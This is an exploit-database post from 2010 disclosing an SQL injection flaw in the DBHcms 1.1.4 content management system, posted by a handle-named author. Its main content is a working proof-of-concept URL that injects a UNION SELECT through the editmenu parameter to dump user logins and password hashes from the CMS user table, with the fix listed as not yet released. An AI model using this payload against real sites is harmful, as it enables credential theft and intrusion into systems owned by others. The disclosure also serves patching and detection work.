Home / os / win7

[webapps / 0day] - DBHcms 1.1.4 SQL Injection Vulnerability

Posted on 24 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title> DBHcms 1.1.4 SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content=' DBHcms 1.1.4 SQL Injection Vulnerability by ZonTa in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================
DBHcms 1.1.4 SQL Injection Vulnerability
========================================

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com
# IM : zontahackers[at]live[dot]com
 
# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5
 
 
ABOUT
--------------
 
The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.
 
 
POC
--------------
 
http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&amp;editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
 
 
FIX
--------------
 
Not yet released.
 
 
Greetz to Sri Lankanz ~


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-24]</pre></body></html>

 

TOP

Malware :

Exploits :